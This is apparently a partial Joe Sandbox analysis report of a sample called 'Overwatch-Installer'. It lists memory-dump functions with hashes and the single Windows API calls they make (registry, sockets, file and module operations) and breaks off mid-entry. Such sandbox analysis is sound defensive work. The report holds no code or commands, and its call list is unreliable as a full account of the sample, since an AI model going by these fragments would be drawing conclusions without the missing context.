Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 3a0589da82a387bee6811804600f793460a0f23aa576a83696a17244b02b978a
Instruction ID: 9ea5dd6cbcf16f7bcf23d37daac044f123c169a3f55e08b134e5c6d88b5ff0f3
Opcode Fuzzy Hash: 3a0589da82a387bee6811804600f793460a0f23aa576a83696a17244b02b978a
Instruction Fuzzy Hash: C331C371409384AFEB22CF50DC44FA6FFB8EF46314F08889AE9859B552D364A509C7B5

Function 05BF2685 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF2716

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 38de7c1e81a23477636291e0a9133ddce355dcedb9dcf20c3646e53365917e5d
Instruction ID: 1f61eb190f37d740de6f23aa392f632ddce56803b39f47f0a1f906a60ddec990
Opcode Fuzzy Hash: 38de7c1e81a23477636291e0a9133ddce355dcedb9dcf20c3646e53365917e5d
Instruction Fuzzy Hash: 3921B175509380AFE722CB51CC45FA6FFB8EF46210F0884AAE985CB652D364E808CB71

Function 05BF2599 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF2626

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: af3b8ba4d8f88fec864f5e5875cff786e6cfc18b5fff96d96a01a39c0df977f1
Instruction ID: 2a37e09e0c87f287095e9dbe4727ef48fb3980affe1f2f5302fd747d9912b3cd
Opcode Fuzzy Hash: af3b8ba4d8f88fec864f5e5875cff786e6cfc18b5fff96d96a01a39c0df977f1
Instruction Fuzzy Hash: 2121D1725093806FE712CB60DC44FA6FFB8EF06314F0884EAE985CB162C264A908CB71

Function 05BF4316 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(?,?,?,?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF43AD

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: ac1ca79594c3011c00462f6f109a2fbc1fff6f6a5cdfcea58770f2b672a2f850
Instruction ID: 8b6785f54d8087b9b0b63fccb8260b58134666e0ea9d552124dd8b8a9e12a914
Opcode Fuzzy Hash: ac1ca79594c3011c00462f6f109a2fbc1fff6f6a5cdfcea58770f2b672a2f850
Instruction Fuzzy Hash: 0731197150E3C06FDB138B65DC55A62BFB8EF47614B0984DBE984CF1A3D265A808C772

Function 05BF277C Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 05BF2822

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: d552573a33c3e5d4a7ec2ad1ad908a38a70cea6e91e93645ef507a9a40bf287b
Instruction ID: effcbf21a4d18012353ec8b08fb1c05b1335ff6ce77d85552f6218560a39f566
Opcode Fuzzy Hash: d552573a33c3e5d4a7ec2ad1ad908a38a70cea6e91e93645ef507a9a40bf287b
Instruction Fuzzy Hash: E921DD715093C06FD312CB65CC55B66BFB8EF87210F0984DBD884CB6A3C624A909C7B2

Function 0112BE78 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 0112BF0D

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 61c59df2fd8d2ea2319611a80eab6b9cc84c8a3552acda7b202f8da4fda723e3
Instruction ID: 91a2bb32c304a6abfbf704d020070fa6e989abbe822f8ce5c50960ea0a3c323e
Opcode Fuzzy Hash: 61c59df2fd8d2ea2319611a80eab6b9cc84c8a3552acda7b202f8da4fda723e3
Instruction Fuzzy Hash: 8D21F8B54097C06FD7138B25DC45BA6BFBCEF47724F0880D6E9808B693D264A909C775

Function 05BF46AF Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF4734

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: eb85b018df049d2cda3f3faf32792571126bf1c935f333e402041e164ee4c5bf
Instruction ID: 74fc66995eb3337e23ba16cc8a0d19b9f0e6a4cc9cd448e42b10d815e17c6341
Opcode Fuzzy Hash: eb85b018df049d2cda3f3faf32792571126bf1c935f333e402041e164ee4c5bf
Instruction Fuzzy Hash: 8421F5715093806FD712CB50CC45FABBFA8EF46324F0884EAE944CB592C364A848C7B5

Function 05BF0257 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 05BF02FA

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1c7cfe2290c594b8fa21e3f4c06b52ea1c8f7255034627423809425ac7bf3ce4
Instruction ID: 12c247ad296e77bbb3ba45bc8ffd6ed2d3e5f7830f555b0e7b28c0b3ae098b5b
Opcode Fuzzy Hash: 1c7cfe2290c594b8fa21e3f4c06b52ea1c8f7255034627423809425ac7bf3ce4
Instruction Fuzzy Hash: 0121D67550E3C06FD3138B25CC51B62BFB4EF47610F0A80DBE8848B693D225A919D7B2

Function 05BF4152 Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF41F0

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 91e6fa12640071bdd1b9d4962aaa3afacfc29be3899786aeaeb1fecb30a2d29c
Instruction ID: bb0bcd9377f8c290a1ae3d778fb0d5fea65c09026f257df35979421e67b9dc92
Opcode Fuzzy Hash: 91e6fa12640071bdd1b9d4962aaa3afacfc29be3899786aeaeb1fecb30a2d29c
Instruction Fuzzy Hash: 8521A372509380AFE722CF51DC44F67FFB8EF45210F08849AE9458B692D364E948C771

Function 05BF0D64 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF0DF8

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 788b36092022d5fff672d77e67537ab5c27b54c5e474f58f46a11ac241f5cf62
Instruction ID: 47adac73025c6f6364f5c04b7d573f5615d991ca99451068b9519772d7f24553
Opcode Fuzzy Hash: 788b36092022d5fff672d77e67537ab5c27b54c5e474f58f46a11ac241f5cf62
Instruction Fuzzy Hash: B52103B1404384AFE712CB50DC45FA6BFA8EF46324F0484AAE9848B192D374A909CBB5

Function 05BF16B2 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05BF1731

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 476b6490b8be7fe8b39fc8bd8877a4e0855f0df0a9f74c23a0fa1289e8be7405
Instruction ID: 4c36bfd5ff91b7d503914ed08bb3d85ab56bd854653cdb12f07049c88f7a5ad2
Opcode Fuzzy Hash: 476b6490b8be7fe8b39fc8bd8877a4e0855f0df0a9f74c23a0fa1289e8be7405
Instruction Fuzzy Hash: 6A219DB2504244EEE720DF65DC44FABBBACEB04214F04886AEA49DB641D724E40D8BB5

Function 05BF4ECC Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 05BF4F72

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 3a40a7e1bdc46eb1a600ebceeb9a195b51d7abb056ffd4e6772abeba2bf8af76
Instruction ID: e6e4d5b72a7262147a153cbca109bc9b80a39657802a3bf4534e70958c391707
Opcode Fuzzy Hash: 3a40a7e1bdc46eb1a600ebceeb9a195b51d7abb056ffd4e6772abeba2bf8af76
Instruction Fuzzy Hash: 47215C7550E3C06FC3128B758C65A16BFB4EF87610F1980DFD8848B6A3D225A91AC7A2

Function 05BF3A1B Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF3AA2

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 4cdbb536fabf9beaf0e67110a59b8ea73b46bc6b8812cafc14de8ea4d22aa644
Instruction ID: 8d06e0b81fbd2a5b44b8ab02db5810dfe527ede2fcbc7007fed32e4fd4b1547a
Opcode Fuzzy Hash: 4cdbb536fabf9beaf0e67110a59b8ea73b46bc6b8812cafc14de8ea4d22aa644
Instruction Fuzzy Hash: 4921A1711083806FD711CB61DC44FA6BFB8EF06310F08849AE9858B652C365A848CB75

Function 05BF09D6 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05BF0A6A

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 806deb5a62d267dd6ca69f5340432844e6419b7f13e4bbc2553fffbb30ef5a94
Instruction ID: 3a7474e5238030f7d37864ab3eca92366ea827063e51473313de46ba3adc07ef
Opcode Fuzzy Hash: 806deb5a62d267dd6ca69f5340432844e6419b7f13e4bbc2553fffbb30ef5a94
Instruction Fuzzy Hash: BB21B171409384AFE722CF55CC44F96FFF8EF09214F04849EE9858B652D365A508CB76

Function 0112BDA2 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0112BE21

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c3b74b57b5366d72f852a7085dc05da8dc7217182908e50c264f877b68c36349
Instruction ID: 5fe3765dd29354354fb142e7b6633624f941024e9e7fd2e73e8dd0779c09c270
Opcode Fuzzy Hash: c3b74b57b5366d72f852a7085dc05da8dc7217182908e50c264f877b68c36349
Instruction Fuzzy Hash: 7521E071504244AFEB21CF65CC84BA6FBE8EF04314F04886DEA458B652D371E458CB76

Function 0112B420 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 0112B4BB

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a4ee9b87c5f64d4be1e00cf6cefa72d226af5033989f3657ef1e3c50ecc8e22a
Instruction ID: 426124777f5b8aa20746f5bf79779947a0b180774c539f3f8c3bef71b24bc76c
Opcode Fuzzy Hash: a4ee9b87c5f64d4be1e00cf6cefa72d226af5033989f3657ef1e3c50ecc8e22a
Instruction Fuzzy Hash: E721C5710093806FE722CF15CC85BA6FFB8EF06724F1880DAE9859B192C365A949CB75

Function 05BF6AF5 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF6B84

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: f23eb3e434086739cd1dcde71144e2322d54546284426ffeb33066a5c3e9a2bc
Instruction ID: 0b75b7d67aa2ed00e6f1ea94039545037d3dd52f13e32c98399899acc0ccca00
Opcode Fuzzy Hash: f23eb3e434086739cd1dcde71144e2322d54546284426ffeb33066a5c3e9a2bc
Instruction Fuzzy Hash: 5821487140E3C09FDB138B748C65691BFB4EF07210F0A84DBD9848F1A3D269A849DB62

Function 05BF0846 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05BF08B7

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 45ec5c99bda1ce6ec189af397fb3b8efef05316a42e68f2baad71782a1da95cf
Instruction ID: 2634828ecb9abbf81dc6e3926eab5d2d01fb6c801441a86b4edfa5c2a08edc52
Opcode Fuzzy Hash: 45ec5c99bda1ce6ec189af397fb3b8efef05316a42e68f2baad71782a1da95cf
Instruction Fuzzy Hash: FC21B072500248AFEB20DF68DC44FABFBACEB04614F04846AEA45CB652D364E4088BB1

Function 0112B606 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0112B685

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 198cac92195c48bae36ebf12902e19e9f063f612e409f31cb2aea3208659afea
Instruction ID: c3f09bef92ee3cf5e849f559d92af05d75f9ec69ca2ca06e0b665e4317234853
Opcode Fuzzy Hash: 198cac92195c48bae36ebf12902e19e9f063f612e409f31cb2aea3208659afea
Instruction Fuzzy Hash: 0A21DE72404244EEE7319F55CC84FABFBECEF04314F04845AEA448BA52D320E51C8BBA

Function 05BF4FBE Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05BF5032

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ad5d5d6f6bb7fd27d614d7eb87c717f46d229b7851f37191f83a73f876bc9483
Instruction ID: bcd38f566ae8c235cc5e1f82d2319c9b0c24467a00b42f05638ebb23e8963226
Opcode Fuzzy Hash: ad5d5d6f6bb7fd27d614d7eb87c717f46d229b7851f37191f83a73f876bc9483
Instruction Fuzzy Hash: 13218E71504204AFEB219F65DC44FAABBACEF04610F0484AAEE458B691D375E44C8BB5

Function 05BF13F2 Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF1476

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: d44a6f60fcaf65053714c7a7cb110ff33edfa3ef5315ff104e46d178e6138b81
Instruction ID: 43448cae92f1f80de209565574286eb29570345e61b5cf4591526e6e1c8b46fd
Opcode Fuzzy Hash: d44a6f60fcaf65053714c7a7cb110ff33edfa3ef5315ff104e46d178e6138b81
Instruction Fuzzy Hash: E42180B1409384AFD721CB55CC44FA7FBBCEF45214F0884ABE985DB652D324A548CBB5

Function 05BF2102 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF2191

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 93f2e7cb9c44cee1a704ef966398330b85d42bd35487f6343feda0765db8caa5
Instruction ID: 716f49928294af8ddf0995623e4a19c38589af673a13f3489bc8422e8fa3aefe
Opcode Fuzzy Hash: 93f2e7cb9c44cee1a704ef966398330b85d42bd35487f6343feda0765db8caa5
Instruction Fuzzy Hash: 6721A1754093806FD7228B51DC44FA6FFB8EF06310F0884DAE9848B692D365A909CBB6

Function 05BF18B2 Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05BF1926

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 881879acee6c2088a48b71788f8c520d6a4b93464235018710d5569a1b88299c
Instruction ID: 0f5db4258287757be05433405d0730c333645ca1e52959c88db5dc99064415c3
Opcode Fuzzy Hash: 881879acee6c2088a48b71788f8c520d6a4b93464235018710d5569a1b88299c
Instruction Fuzzy Hash: AA218E71504244EFEB209F55DC44FAABBACEF04614F0488AAEE459B642D335E84DCBB1

Function 05BF3C9C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 05BF3D20

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 383c917ba3eca44922c685c23a54a0f77efbeeea6dddd2a23a9c527244e2f858
Instruction ID: ae8484bb51847b8b492d1bbb66281dbdffd6cdbca0120139f3d9aae385c5dd69
Opcode Fuzzy Hash: 383c917ba3eca44922c685c23a54a0f77efbeeea6dddd2a23a9c527244e2f858
Instruction Fuzzy Hash: 2B213B755083849FD721CF15D844BA2BFF8EF46610F08889AE985CB262D365E848CB61

Function 05BF3B02 Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF3B8A

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: ea3a736470ad3d2c5002afc16fae44972105683e43e0dee195c796b41ef416e2
Instruction ID: 5edd49aa3b39025cf4027ff32248522ce86d99a1600547cadb53ff99a0ce1f67
Opcode Fuzzy Hash: ea3a736470ad3d2c5002afc16fae44972105683e43e0dee195c796b41ef416e2
Instruction Fuzzy Hash: BA21B071408380AFD722CF50DC44FA6FFB8EF45314F0888AAE9849B552C365A408CBB5

Function 05BF0C9A Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05BF0D0D

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 75b5f80c12130de3928c92ab97e4a49c4801e8c77cee97a96faba2deaf43558c
Instruction ID: abff5048603e5e7515b38c02b3e44e2c67338bfe05cab17fc4eed59c7dad84fb
Opcode Fuzzy Hash: 75b5f80c12130de3928c92ab97e4a49c4801e8c77cee97a96faba2deaf43558c
Instruction Fuzzy Hash: 6F21D0B5504248AFE720DF25CD49BA6FBE8EF04214F0484A9EE498B652D770F408CB76

Function 05BF1232 Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF12AD

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 763b3a43d7445a67898186ce4474ba512c7418c6f539e1c8f7d82a90facaa2f1
Instruction ID: 4758c3662c56788367749cf15493388a1f239a4d200bb1a06d01d4962100877a
Opcode Fuzzy Hash: 763b3a43d7445a67898186ce4474ba512c7418c6f539e1c8f7d82a90facaa2f1
Instruction Fuzzy Hash: 50216D75504604EFEB21CF95CC44FAAFBE8EF04710F0489AAEA45CB651D331E448CB65

Function 05BF14C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF154F

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: c181f07995db7c248507802960b3c3bd0412e127be33640ed7a5f3b9ee67df97
Instruction ID: b78f849be5d337005518a0261f234ac94d363e322e5c7a63770cbc80e5729a83
Opcode Fuzzy Hash: c181f07995db7c248507802960b3c3bd0412e127be33640ed7a5f3b9ee67df97
Instruction Fuzzy Hash: B621C2B1409384AFD7228B14DC45FA6FFB8EF46314F0884DAE9858B553D265A908CBB5

Function 05BF00E2 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF0161

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4f32469f547f951812479d47e1f4622d690a5d061f551588b7084f2803015c7f
Instruction ID: e229e87debf8571c90bdf618b6793e75c4fd6d061f976dbfa862b1d2f9b913ab
Opcode Fuzzy Hash: 4f32469f547f951812479d47e1f4622d690a5d061f551588b7084f2803015c7f
Instruction Fuzzy Hash: 12218E71409384AFDB22CF51DC48FA6FFB8EF45314F08849AE9858B552C325A508CBB6

Function 0112B70E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 0112B788

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4b46cebdb0343ba29b4a5220db1da68d0fd548e0a44fec080b8d2f579673a0d3
Instruction ID: f94fe52f7a01d59ab2435214cb621de712a1847bbb1d5c1a3617eeb261a11eab
Opcode Fuzzy Hash: 4b46cebdb0343ba29b4a5220db1da68d0fd548e0a44fec080b8d2f579673a0d3
Instruction Fuzzy Hash: CE21AC75204644AFE721CF15CC80FA6FBECEF04610F08846AEA45CB692D760E858CBB9

Function 05BF21CE Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05BF2252

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 431861bd14c13a76982f1669e2d99ac9b2ae6d6bced347952bfc30ae3a9fb98f
Instruction ID: c190e2548e51bc34cfe71bf6b89622345bd78fc055776ec3500b21a2869037e6
Opcode Fuzzy Hash: 431861bd14c13a76982f1669e2d99ac9b2ae6d6bced347952bfc30ae3a9fb98f
Instruction Fuzzy Hash: B6217A754093809FDB22CF61DC84AA2FFB4FF0A210F0984DEE9858B163D261A819DB61

Function 05BF1133 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF11AF

Memory Dump Source

